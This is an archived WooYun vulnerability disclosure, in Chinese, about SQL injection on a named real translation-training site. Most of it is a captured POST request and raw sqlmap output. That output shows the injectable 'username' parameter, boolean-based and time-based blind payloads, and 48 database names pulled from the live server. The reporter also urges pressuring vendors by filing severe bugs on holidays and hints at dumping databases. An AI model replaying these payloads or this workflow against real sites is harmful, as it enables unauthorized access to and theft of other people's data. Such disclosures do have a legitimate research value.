乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-29: 细节已通知厂商并且等待厂商处理中 2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开
最不喜欢动不动就问厂商要礼物的~ 靠! 他实在不给你就使劲提交漏洞!!最好在节假日提交很高危的漏洞!!!~裤子也挺重要的!
POST /tools/fanyidasai/fanyidasai.php HTTP/1.1Host: college.transn.comProxy-Connection: keep-aliveContent-Length: 116Accept: text/plain, */*; q=0.01Origin: http://college.transn.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://college.transn.com/tools/fanyidasai/regist.htmlAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8username=123&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class=&number=&cardid=&tel=&email=
[root@Hacker~]# Sqlmap Sqlmap -r E:\1.txt --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey al[*] starting at 10:11:18[10:11:18] [INFO] parsing HTTP request from 'E:\1.txt'[10:11:18] [INFO] testing connection to the target URL[10:11:18] [INFO] testing if the target URL is stable. This can take a couple of seconds[10:11:20] [INFO] target URL is stable[10:11:20] [INFO] testing if POST parameter 'username' is dynamic[10:11:20] [WARNING] POST parameter 'username' does not appear dynamic[10:11:20] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'MySQL')[10:11:20] [INFO] testing for SQL injection on POST parameter 'username'heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] ydo you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y[10:11:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[10:11:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'[10:11:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'[10:11:28] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'[10:11:29] [INFO] POST parameter 'username' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable[10:11:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'[10:11:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'[10:11:29] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'[10:11:29] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'[10:11:29] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'[10:11:30] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'[10:11:30] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'[10:11:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'[10:11:30] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'[10:11:30] [INFO] testing 'MySQL inline queries'[10:11:30] [INFO] testing 'MySQL > 5.0.11 stacked queries'[10:11:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'[10:11:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'[10:11:30] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'[10:11:50] [INFO] POST parameter 'username' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable[10:11:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'[10:11:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique fou[10:11:50] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automaticall[10:11:51] [INFO] target URL appears to have 37 columns in queryinjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y[10:12:10] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)[10:12:10] [INFO] testing 'MySQL UNION query (14) - 22 to 40 columns'[10:12:12] [INFO] target URL appears to be UNION injectable with 37 columns[10:12:18] [INFO] testing 'MySQL UNION query (14) - 42 to 60 columns'[10:12:20] [INFO] testing 'MySQL UNION query (14) - 62 to 80 columns'[10:12:21] [INFO] testing 'MySQL UNION query (14) - 82 to 100 columns'[10:12:23] [INFO] testing 'Generic UNION query (14) - 1 to 20 columns'POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 446 HTTP(s) requests:---Place: POSTParameter: username Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: username=123' RLIKE IF(9850=9850,123,0x28) AND 'dDUu'='dDUu&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m&college=&class Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: username=123' AND 4617=BENCHMARK(5000000,MD5(0x75645772)) AND 'kvZl'='kvZl&password=123&newpassword1=&newpassword2=&mode=0&name=&sex=m---[10:12:34] [INFO] testing MySQL[10:12:34] [INFO] confirming MySQL[10:12:34] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.3, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[10:12:34] [INFO] fetching database names[10:12:34] [INFO] fetching number of databases[10:12:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[10:12:34] [INFO] retrieved: 48[10:12:35] [INFO] retrieved: information_schema[10:12:49] [INFO] retrieved: TCATPDB[10:12:55] [INFO] retrieved: bk_release_wattapi[10:13:09] [INFO] retrieved: ctat[10:13:12] [INFO] retrieved: edu_web[10:13:18] [INFO] retrieved: entwcat[10:13:24] [INFO] retrieved: icatweb[10:13:30] [INFO] retrieved: miniwcat[10:13:36] [INFO] retrieved: miniwtm_miniwcat[10:13:49] [INFO] retrieved: mysql[10:13:53] [INFO] retrieved: nankaictat[10:14:01] [INFO] retrieved: nankaitraining[10:14:12] [INFO] retrieved: nankaitraining_wtm[10:14:26] [INFO] retrieved: new_training[10:14:36] [INFO] retrieved: new_training_wtm[10:14:49] [INFO] retrieved: release_translib[10:15:01] [INFO] retrieved: release_wattapi_new[10:15:19] [INFO] retrieved: school[10:15:24] [INFO] retrieved: school_bfsu[10:15:33] [INFO] retrieved: school_bfsu_wtm[10:15:45] [INFO] retrieved: school_wtm[10:15:56] [INFO] retrieved: tcat_ent[10:16:03] [INFO] retrieved: tcat_ent_test[10:16:13] [INFO] retrieved: tcatwebsite[10:16:22] [INFO] retrieved: test[10:16:26] [INFO] retrieved: test0801_wattapi[10:16:38] [INFO] retrieved: test_entwcat[10:16:48] [INFO] retrieved: test_translib[10:16:58] [INFO] retrieved: test_wattapi[10:17:08] [INFO] retrieved: testctat[10:17:14] [INFO] retrieved: testedu_web[10:17:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[10:17:45] [INFO] retrieved: testminiwcat[10:17:55] [INFO] retrieved: testminiwtm_miniwcat[10:18:10] [INFO] retrieved: testschool[10:18:18] [INFO] retrieved: testschool_wtm[10:18:30] [INFO] retrieved: testtportal[10:18:39] [INFO] retrieved: testwtm[10:18:45] [INFO] retrieved: testwtm_miniwcat[10:18:57] [INFO] retrieved: tportal[10:19:03] [INFO] retrieved: training[10:19:10] [INFO] retrieved: training_ctat[10:19:20] [INFO] retrieved: training_wtm[10:19:30] [INFO] retrieved: transndict[10:19:38] [INFO] retrieved: transndict_logs[10:19:52] [INFO] retrieved: v_translib[10:20:00] [INFO] retrieved: v_wattapi[10:20:08] [INFO] retrieved: wtm[10:20:11] [INFO] retrieved: wtm_miniwcatavailable databases [48]:[*] bk_release_wattapi[*] ctat[*] edu_web[*] entwcat[*] icatweb[*] information_schema[*] miniwcat[*] miniwtm_miniwcat[*] mysql[*] nankaictat[*] nankaitraining[*] nankaitraining_wtm[*] new_training[*] new_training_wtm[*] release_translib[*] release_wattapi_new[*] school[*] school_bfsu[*] school_bfsu_wtm[*] school_wtm[*] tcat_ent[*] tcat_ent_test[*] TCATPDB[*] tcatwebsite[*] test[*] test0801_wattapi[*] test_entwcat[*] test_translib[*] test_wattapi[*] testctat[*] testedu_web[*] testminiwcat[*] testminiwtm_miniwcat[*] testschool[*] testschool_wtm[*] testtportal[*] testwtm[*] testwtm_miniwcat[*] tportal[*] training[*] training_ctat[*] training_wtm[*] transndict[*] transndict_logs[*] v_translib[*] v_wattapi[*] wtm[*] wtm_miniwcat[10:20:24] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled[10:20:24] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\college.transn.com'
亲,索要联系方式这么久了,我也是醉了!
危害等级:无影响厂商忽略
忽略时间:2015-05-04 10:44
漏洞Rank:4 (WooYun评价)
暂无